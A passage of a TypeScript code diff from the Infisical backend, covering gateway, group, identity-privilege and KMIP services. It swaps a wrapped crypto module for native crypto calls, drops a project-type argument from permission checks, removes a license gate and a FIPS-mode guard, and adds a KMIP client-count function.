     const alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.RSA_2048);
-    const gatewayKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const gatewayKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
     const certIssuedAt = new Date();
     // then need to periodically init
     const certExpireAt = new Date(new Date().setMonth(new Date().getMonth() + 1));
@@ -366,7 +367,7 @@ export const gatewayServiceFactory = ({
     ];
 
     const serialNumber = createSerialNumber();
-    const privateKey = crypto.nativeCrypto.KeyObject.from(gatewayKeys.privateKey);
+    const privateKey = crypto.KeyObject.from(gatewayKeys.privateKey);
     const gatewayCertificate = await x509.X509CertificateGenerator.create({
       serialNumber,
       subject: `CN=${identityId},O=${identityOrg},OU=Gateway`,
@@ -453,7 +454,7 @@ export const gatewayServiceFactory = ({
       })
     );
 
-    const privateKey = crypto.nativeCrypto
+    const privateKey = crypto
       .createPrivateKey({
         key: orgKmsDecryptor({ cipherTextBlob: orgGatewayConfig.encryptedClientPrivateKey }),
         format: "der",
@@ -566,14 +567,6 @@ export const gatewayServiceFactory = ({
     if (!gateway) throw new NotFoundError({ message: `Gateway with ID ${gatewayId} not found.` });
 
     const orgGatewayConfig = await orgGatewayConfigDAL.findById(gateway.orgGatewayRootCaId);
-
-    const orgLicensePlan = await licenseService.getPlan(orgGatewayConfig.orgId);
-    if (!orgLicensePlan.gateway) {
-      throw new BadRequestError({
-        message: "Please upgrade your instance to Infisical's Enterprise plan to use gateways."
-      });
-    }
-
     const { decryptor: orgKmsDecryptor } = await kmsService.createCipherPairWithDataKey({
       type: KmsDataKey.Organization,
       orgId: orgGatewayConfig.orgId
@@ -595,7 +588,7 @@ export const gatewayServiceFactory = ({
       })
     );
 
-    const clientSkObj = crypto.nativeCrypto.createPrivateKey({
+    const clientSkObj = crypto.createPrivateKey({
       key: orgKmsDecryptor({ cipherTextBlob: orgGatewayConfig.encryptedClientPrivateKey }),
       format: "der",
       type: "pkcs8"

backend/src/ee/services/group/group-fns.ts

@@ -1,7 +1,7 @@
 import { Knex } from "knex";
 
 import { SecretKeyEncoding, TableName, TUsers } from "@app/db/schemas";
-import { crypto } from "@app/lib/crypto/cryptography";
+import { decryptAsymmetric, encryptAsymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
 import { BadRequestError, ForbiddenRequestError, NotFoundError, ScimRequestError } from "@app/lib/errors";
 
 import {
@@ -94,17 +94,14 @@ const addAcceptedUsersToGroup = async ({
         });
       }
 
-      const botPrivateKey = crypto
-        .encryption()
-        .symmetric()
-        .decryptWithRootEncryptionKey({
-          keyEncoding: bot.keyEncoding as SecretKeyEncoding,
-          iv: bot.iv,
-          tag: bot.tag,
-          ciphertext: bot.encryptedPrivateKey
-        });
+      const botPrivateKey = infisicalSymmetricDecrypt({
+        keyEncoding: bot.keyEncoding as SecretKeyEncoding,
+        iv: bot.iv,
+        tag: bot.tag,
+        ciphertext: bot.encryptedPrivateKey
+      });
 
-      const plaintextProjectKey = crypto.encryption().asymmetric().decrypt({
+      const plaintextProjectKey = decryptAsymmetric({
         ciphertext: ghostUserLatestKey.encryptedKey,
         nonce: ghostUserLatestKey.nonce,
         publicKey: ghostUserLatestKey.sender.publicKey,
@@ -112,10 +109,11 @@ const addAcceptedUsersToGroup = async ({
       });
 
       const projectKeysToAdd = usersToAddProjectKeyFor.map((user) => {
-        const { ciphertext: encryptedKey, nonce } = crypto
-          .encryption()
-          .asymmetric()
-          .encrypt(plaintextProjectKey, user.publicKey, botPrivateKey);
+        const { ciphertext: encryptedKey, nonce } = encryptAsymmetric(
+          plaintextProjectKey,
+          user.publicKey,
+          botPrivateKey
+        );
         return {
           encryptedKey,
           nonce,

backend/src/ee/services/identity-project-additional-privilege-v2/identity-project-additional-privilege-v2-service.ts

@@ -1,7 +1,7 @@
 import { ForbiddenError, subject } from "@casl/ability";
 import { packRules } from "@casl/ability/extra";
 
-import { ActionProjectType, TableName } from "@app/db/schemas";
+import { TableName } from "@app/db/schemas";
 import { BadRequestError, NotFoundError, PermissionBoundaryError } from "@app/lib/errors";
 import { ms } from "@app/lib/ms";
 import { validateHandlebarTemplate } from "@app/lib/template/validate-handlebars";
@@ -61,8 +61,7 @@ export const identityProjectAdditionalPrivilegeV2ServiceFactory = ({
       actorId,
       projectId: identityProjectMembership.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.Any
+      actorOrgId
     });
     ForbiddenError.from(permission).throwUnlessCan(
       ProjectPermissionIdentityActions.Edit,
@@ -73,8 +72,7 @@ export const identityProjectAdditionalPrivilegeV2ServiceFactory = ({
       actorId: identityId,
       projectId: identityProjectMembership.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.Any
+      actorOrgId
     });
 
     // we need to validate that the privilege given is not higher than the assigning users permission
@@ -160,8 +158,7 @@ export const identityProjectAdditionalPrivilegeV2ServiceFactory = ({
       actorId,
       projectId: identityProjectMembership.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.Any
+      actorOrgId
     });
     ForbiddenError.from(permission).throwUnlessCan(
       ProjectPermissionIdentityActions.Edit,
@@ -172,8 +169,7 @@ export const identityProjectAdditionalPrivilegeV2ServiceFactory = ({
       actorId: identityProjectMembership.identityId,
       projectId: identityProjectMembership.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.Any
+      actorOrgId
     });
 
     // we need to validate that the privilege given is not higher than the assigning users permission
@@ -260,8 +256,7 @@ export const identityProjectAdditionalPrivilegeV2ServiceFactory = ({
       actorId,
       projectId: identityProjectMembership.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.Any
+      actorOrgId
     });
     ForbiddenError.from(permission).throwUnlessCan(
       ProjectPermissionIdentityActions.Edit,
@@ -272,8 +267,7 @@ export const identityProjectAdditionalPrivilegeV2ServiceFactory = ({
       actorId: identityProjectMembership.identityId,
       projectId: identityProjectMembership.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.Any
+      actorOrgId
     });
     const permissionBoundary = validatePrivilegeChangeOperation(
       membership.shouldUseNewPrivilegeSystem,
@@ -321,8 +315,7 @@ export const identityProjectAdditionalPrivilegeV2ServiceFactory = ({
       actorId,
       projectId: identityProjectMembership.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.Any
+      actorOrgId
     });
     ForbiddenError.from(permission).throwUnlessCan(
       ProjectPermissionIdentityActions.Read,
@@ -356,8 +349,7 @@ export const identityProjectAdditionalPrivilegeV2ServiceFactory = ({
       actorId,
       projectId: identityProjectMembership.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.Any
+      actorOrgId
     });
     ForbiddenError.from(permission).throwUnlessCan(
       ProjectPermissionIdentityActions.Read,
@@ -392,8 +384,7 @@ export const identityProjectAdditionalPrivilegeV2ServiceFactory = ({
       actorId,
       projectId: identityProjectMembership.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.Any
+      actorOrgId
     });
     ForbiddenError.from(permission).throwUnlessCan(
       ProjectPermissionIdentityActions.Read,

backend/src/ee/services/identity-project-additional-privilege/identity-project-additional-privilege-service.ts

@@ -1,7 +1,6 @@
 import { ForbiddenError, MongoAbility, RawRuleOf, subject } from "@casl/ability";
 import { PackRule, packRules, unpackRules } from "@casl/ability/extra";
 
-import { ActionProjectType } from "@app/db/schemas";
 import { BadRequestError, NotFoundError, PermissionBoundaryError } from "@app/lib/errors";
 import { ms } from "@app/lib/ms";
 import { validateHandlebarTemplate } from "@app/lib/template/validate-handlebars";
@@ -73,8 +72,7 @@ export const identityProjectAdditionalPrivilegeServiceFactory = ({
       actorId,
       projectId: identityProjectMembership.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.Any
+      actorOrgId
     });
 
     ForbiddenError.from(permission).throwUnlessCan(
@@ -87,8 +85,7 @@ export const identityProjectAdditionalPrivilegeServiceFactory = ({
       actorId: identityId,
       projectId: identityProjectMembership.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.Any
+      actorOrgId
     });
 
     // we need to validate that the privilege given is not higher than the assigning users permission
@@ -175,8 +172,7 @@ export const identityProjectAdditionalPrivilegeServiceFactory = ({
       actorId,
       projectId: identityProjectMembership.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.Any
+      actorOrgId
     });
 
     ForbiddenError.from(permission).throwUnlessCan(
@@ -189,8 +185,7 @@ export const identityProjectAdditionalPrivilegeServiceFactory = ({
       actorId: identityProjectMembership.identityId,
       projectId: identityProjectMembership.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.Any
+      actorOrgId
     });
 
     // we need to validate that the privilege given is not higher than the assigning users permission
@@ -293,8 +288,7 @@ export const identityProjectAdditionalPrivilegeServiceFactory = ({
       actorId,
       projectId: identityProjectMembership.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.Any
+      actorOrgId
     });
     ForbiddenError.from(permission).throwUnlessCan(
       ProjectPermissionIdentityActions.Edit,
@@ -306,8 +300,7 @@ export const identityProjectAdditionalPrivilegeServiceFactory = ({
       actorId: identityProjectMembership.identityId,
       projectId: identityProjectMembership.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.Any
+      actorOrgId
     });
     const permissionBoundary = validatePrivilegeChangeOperation(
       membership.shouldUseNewPrivilegeSystem,
@@ -366,8 +359,7 @@ export const identityProjectAdditionalPrivilegeServiceFactory = ({
       actorId,
       projectId: identityProjectMembership.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.Any
+      actorOrgId
     });
     ForbiddenError.from(permission).throwUnlessCan(
       ProjectPermissionIdentityActions.Read,
@@ -409,8 +401,7 @@ export const identityProjectAdditionalPrivilegeServiceFactory = ({
       actorId,
       projectId: identityProjectMembership.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.Any
+      actorOrgId
     });
 
     ForbiddenError.from(permission).throwUnlessCan(

backend/src/ee/services/kmip/kmip-service.ts

@@ -1,11 +1,11 @@
 import { ForbiddenError } from "@casl/ability";
 import * as x509 from "@peculiar/x509";
+import crypto, { KeyObject } from "crypto";
 
-import { ActionProjectType } from "@app/db/schemas";
-import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError, InternalServerError, NotFoundError } from "@app/lib/errors";
 import { isValidIp } from "@app/lib/ip";
 import { ms } from "@app/lib/ms";
+import { OrgServiceActor } from "@app/lib/types";
 import { isFQDN } from "@app/lib/validator/validate-url";
 import { constructPemChainFromCerts } from "@app/services/certificate/certificate-fns";
 import { CertExtendedKeyUsage, CertKeyAlgorithm, CertKeyUsage } from "@app/services/certificate/certificate-types";
@@ -68,19 +68,12 @@ export const kmipServiceFactory = ({
     description,
     permissions
   }: TCreateKmipClientDTO) => {
-    if (crypto.isFipsModeEnabled()) {
-      throw new BadRequestError({
-        message: "KMIP is currently not supported in FIPS mode of operation."
-      });
-    }
-
     const { permission } = await permissionService.getProjectPermission({
       actor,
       actorId,
       projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.KMS
+      actorOrgId
     });
 
     ForbiddenError.from(permission).throwUnlessCan(
@@ -133,8 +126,7 @@ export const kmipServiceFactory = ({
       actorId,
       projectId: kmipClient.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.KMS
+      actorOrgId
     });
 
     ForbiddenError.from(permission).throwUnlessCan(
@@ -165,8 +157,7 @@ export const kmipServiceFactory = ({
       actorId,
       projectId: kmipClient.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.KMS
+      actorOrgId
     });
 
     ForbiddenError.from(permission).throwUnlessCan(
@@ -199,8 +190,7 @@ export const kmipServiceFactory = ({
       actorId,
       projectId: kmipClient.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.KMS
+      actorOrgId
     });
 
     ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionKmipActions.ReadClients, ProjectPermissionSub.Kmip);
@@ -221,8 +211,7 @@ export const kmipServiceFactory = ({
       actorId,
       projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.KMS
+      actorOrgId
     });
 
     ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionKmipActions.ReadClients, ProjectPermissionSub.Kmip);
@@ -258,8 +247,7 @@ export const kmipServiceFactory = ({
       actorId,
       projectId: kmipClient.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.KMS
+      actorOrgId
     });
 
     ForbiddenError.from(permission).throwUnlessCan(
@@ -305,7 +293,7 @@ export const kmipServiceFactory = ({
     }
 
     const alg = keyAlgorithmToAlgCfg(keyAlgorithm);
-    const leafKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const leafKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
 
     const extensions: x509.Extension[] = [
       new x509.BasicConstraintsExtension(false),
@@ -324,13 +312,13 @@ export const kmipServiceFactory = ({
 
     const caAlg = keyAlgorithmToAlgCfg(kmipConfig.caKeyAlgorithm as CertKeyAlgorithm);
 
-    const caSkObj = crypto.nativeCrypto.createPrivateKey({
+    const caSkObj = crypto.createPrivateKey({
       key: decryptor({ cipherTextBlob: kmipConfig.encryptedClientIntermediateCaPrivateKey }),
       format: "der",
       type: "pkcs8"
     });
 
-    const caPrivateKey = await crypto.nativeCrypto.subtle.importKey(
+    const caPrivateKey = await crypto.subtle.importKey(
       "pkcs8",
       caSkObj.export({ format: "der", type: "pkcs8" }),
       caAlg,
@@ -351,7 +339,7 @@ export const kmipServiceFactory = ({
       extensions
     });
 
-    const skLeafObj = crypto.nativeCrypto.KeyObject.from(leafKeys.privateKey);
+    const skLeafObj = KeyObject.from(leafKeys.privateKey);
 
     const rootCaCert = new x509.X509Certificate(decryptor({ cipherTextBlob: kmipConfig.encryptedRootCaCertificate }));
     const serverIntermediateCaCert = new x509.X509Certificate(
@@ -430,8 +418,8 @@ export const kmipServiceFactory = ({
 
     // generate root CA
     const rootCaSerialNumber = createSerialNumber();
-    const rootCaKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
-    const rootCaSkObj = crypto.nativeCrypto.KeyObject.from(rootCaKeys.privateKey);
+    const rootCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const rootCaSkObj = KeyObject.from(rootCaKeys.privateKey);
     const rootCaIssuedAt = new Date();
     const rootCaExpiration = new Date(new Date().setFullYear(new Date().getFullYear() + 20));
 
@@ -453,8 +441,8 @@ export const kmipServiceFactory = ({
     const serverIntermediateCaSerialNumber = createSerialNumber();
     const serverIntermediateCaIssuedAt = new Date();
     const serverIntermediateCaExpiration = new Date(new Date().setFullYear(new Date().getFullYear() + 10));
-    const serverIntermediateCaKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
-    const serverIntermediateCaSkObj = crypto.nativeCrypto.KeyObject.from(serverIntermediateCaKeys.privateKey);
+    const serverIntermediateCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const serverIntermediateCaSkObj = KeyObject.from(serverIntermediateCaKeys.privateKey);
 
     const serverIntermediateCaCert = await x509.X509CertificateGenerator.create({
       serialNumber: serverIntermediateCaSerialNumber,
@@ -484,8 +472,8 @@ export const kmipServiceFactory = ({
     const clientIntermediateCaSerialNumber = createSerialNumber();
     const clientIntermediateCaIssuedAt = new Date();
     const clientIntermediateCaExpiration = new Date(new Date().setFullYear(new Date().getFullYear() + 10));
-    const clientIntermediateCaKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
-    const clientIntermediateCaSkObj = crypto.nativeCrypto.KeyObject.from(clientIntermediateCaKeys.privateKey);
+    const clientIntermediateCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const clientIntermediateCaSkObj = KeyObject.from(clientIntermediateCaKeys.privateKey);
 
     const clientIntermediateCaCert = await x509.X509CertificateGenerator.create({
       serialNumber: clientIntermediateCaSerialNumber,
@@ -650,8 +638,7 @@ export const kmipServiceFactory = ({
     }
 
     const alg = keyAlgorithmToAlgCfg(keyAlgorithm);
-
-    const leafKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const leafKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
 
     const extensions: x509.Extension[] = [
       new x509.BasicConstraintsExtension(false),
@@ -699,13 +686,13 @@ export const kmipServiceFactory = ({
       cipherTextBlob: kmipOrgConfig.encryptedServerIntermediateCaChain
     }).toString("utf-8");
 
-    const caSkObj = crypto.nativeCrypto.createPrivateKey({
+    const caSkObj = crypto.createPrivateKey({
       key: decryptor({ cipherTextBlob: kmipOrgConfig.encryptedServerIntermediateCaPrivateKey }),
       format: "der",
       type: "pkcs8"
     });
 
-    const caPrivateKey = await crypto.nativeCrypto.subtle.importKey(
+    const caPrivateKey = await crypto.subtle.importKey(
       "pkcs8",
       caSkObj.export({ format: "der", type: "pkcs8" }),
       caAlg,
@@ -726,7 +713,7 @@ export const kmipServiceFactory = ({
       extensions
     });
 
-    const skLeafObj = crypto.nativeCrypto.KeyObject.from(leafKeys.privateKey);
+    const skLeafObj = KeyObject.from(leafKeys.privateKey);
     const certificateChain = `${caCertObj.toString("pem")}\n${decryptedCaCertChain}`.trim();
 
     await kmipOrgServerCertificateDAL.create({
@@ -809,6 +796,26 @@ export const kmipServiceFactory = ({
     };
   };
 
+  const getProjectClientCount = async (projectId: string, actor: OrgServiceActor) => {
+    // Anyone in the project should be able to get count.
+    await permissionService.getProjectPermission({
+      actor: actor.type,
+      actorId: actor.id,
+      projectId,
+      actorAuthMethod: actor.authMethod,
+      actorOrgId: actor.orgId
+    });
+
+    const clients = await kmipClientDAL.find(
+      {
+        projectId
+      },
+      { count: true }
+    );
+
+    return Number(clients?.[0]?.count ?? 0);
+  };
+
   return {
     createKmipClient,
     updateKmipClient,
@@ -820,6 +827,7 @@ export const kmipServiceFactory = ({
     generateOrgKmipServerCertificate,
     getOrgKmip,
     getServerCertificateBySerialNumber,
-    registerServer
+    registerServer,
+    getProjectClientCount
   };
 };